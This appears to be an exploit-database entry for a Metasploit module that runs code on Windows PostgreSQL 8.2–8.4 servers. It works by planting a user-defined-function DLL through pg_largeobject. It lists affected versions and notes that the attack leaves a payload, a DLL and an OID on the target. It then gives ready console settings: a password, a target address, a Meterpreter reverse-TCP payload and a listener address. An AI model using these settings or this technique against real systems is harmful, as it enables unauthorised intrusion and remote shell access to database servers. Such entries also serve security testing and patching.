PostgreSQL UDF for Microsoft Windows Metasploit Payload Execution
PoC provided by :
Affected version(s) :
All Microsoft Windows PostgreSQL, before or equal to 8.4.x 32-bit.
Tested on Windows XP SP3 with :
This module creates and enables a custom UDF (user defined function) on the target host via the UPDATE pg_largeobject method of binary injection. On default Microsoft Windows installations of PostgreSQL, the postgres service account may write to the Windows temp directory, and may source UDF DLL’s from there as well. PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are valid targets for this module. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL and the OID.
set PASSWORD test
set RHOST 192.168.178.63
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21